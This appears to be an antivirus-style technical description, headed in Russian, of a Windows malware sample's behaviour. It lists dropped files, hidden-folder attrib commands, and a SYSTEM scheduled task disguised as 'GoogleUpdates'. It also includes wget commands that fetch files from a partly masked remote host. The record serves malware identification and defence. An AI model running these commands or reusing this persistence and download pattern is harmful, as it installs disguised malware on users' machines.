Техническая информация
- %WINDIR%\Tasks\GoogleUpdates.job
- '%TEMP%\google.exe' -p1234567890__
- '%TEMP%\wget.exe' --load-cookies cookies.txt http://ma##.##cybernews.info/2.php
- '%TEMP%\wget.exe' http://ma##.##cybernews.info/13:56:30..ini
- '%TEMP%\setups.exe' -p1234567890__
- '%TEMP%\wget.exe' --save-cookies cookies.txt http://ma##.##cybernews.info/1.php
- '%TEMP%\GoogleUpdates.exe'
- '<SYSTEM32>\schtasks.exe' /Delete /tn GoogleUpdates /f
- '<SYSTEM32>\attrib.exe' +S +H "c:\$Recycle.Msi"
- '<SYSTEM32>\wscript.exe' "%TEMP%\Google.vbs"
- '<SYSTEM32>\schtasks.exe' /Create /tn GoogleUpdates /TR "c:\$Recycle.Msi\GoogleUpdates.exe" /SC MINUTE /mo 10 /ru "SYSTEM"
- '<SYSTEM32>\ping.exe' -n 10 127.0.0.1
- '<SYSTEM32>\wscript.exe' "%TEMP%\setup.vbs"
- '<SYSTEM32>\attrib.exe' -S -H "c:\$Recycle.Msi"
- '<SYSTEM32>\find.exe' "Microsoft Windows XP"
- %TEMP%\google.exe
- C:\$Recycle.Msi\cookies.txt
- C:\$Recycle.Msi\GoogleUpdates.exe
- %TEMP%\2.php
- %TEMP%\Google.vbs
- %TEMP%\Google.cmd
- %TEMP%\cookies.txt
- %TEMP%\setup.cmd
- %TEMP%\GoogleUpdates.exe
- %TEMP%\setups.exe
- %TEMP%\1.php
- %TEMP%\wget.exe
- %TEMP%\setup.vbs
- 'ma##.##cybernews.info':80
- ma##.##cybernews.info/2.php
- ma##.##cybernews.info/1.php
- DNS ASK ma##.##cybernews.info
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'